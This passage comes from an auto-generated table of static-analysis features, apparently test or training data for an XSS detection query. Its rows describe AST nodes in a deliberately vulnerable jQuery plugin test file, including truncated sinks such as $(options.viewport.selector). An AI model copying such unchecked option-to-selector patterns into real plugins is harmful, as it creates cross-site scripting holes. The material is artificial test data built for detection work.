options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:18 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:18 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:18 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:18 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:18 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:5:132:18 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:13:132:18 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:13:132:18 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:13:132:18 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:132:13:132:18 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:13 | $.fn.tooltip | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:13 | $.fn.tooltip | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:13 | $.fn.tooltip | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:135:13 | $.fn.tooltip | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:137:2 | $.fn.to ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:137:2 | $.fn.to ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:137:2 | $.fn.to ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:2:137:2 | $.fn.to ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:4:135:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:4:135:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:4:135:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:4:135:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:7:135:13 | tooltip | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:7:135:13 | tooltip | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:7:135:13 | tooltip | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:7:135:13 | tooltip | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:135:16 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:135:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:135:16 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:135:16 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | assignedToPropName | tooltip | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:17:137:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:26:135:34 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:26:135:34 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:26:135:34 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:26:135:34 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:135:36:135:42 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | $(optio ... lector) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | $(optio ... lector) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | $(optio ... lector) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | $(optio ... lector) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | exceptional return of $(optio ... lector) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | exceptional return of $(optio ... lector) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | exceptional return of $(optio ... lector) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:3:136:30 | exceptional return of $(optio ... lector) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:11 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:20 | options.viewport | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:20 | options.viewport | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:20 | options.viewport | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:20 | options.viewport | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:13:136:20 | viewport | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:13:136:20 | viewport | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:13:136:20 | viewport | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:13:136:20 | viewport | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:22:136:29 | selector | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:22:136:29 | selector | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:22:136:29 | selector | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:136:22:136:29 | selector | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:139:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:151:2 | $.fn.my ... uery\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:151:2 | $.fn.my ... uery\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:151:2 | $.fn.my ... uery\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:2:151:2 | $.fn.my ... uery\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:4:139:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:4:139:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:4:139:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:4:139:5 | fn | fileImports | | +| 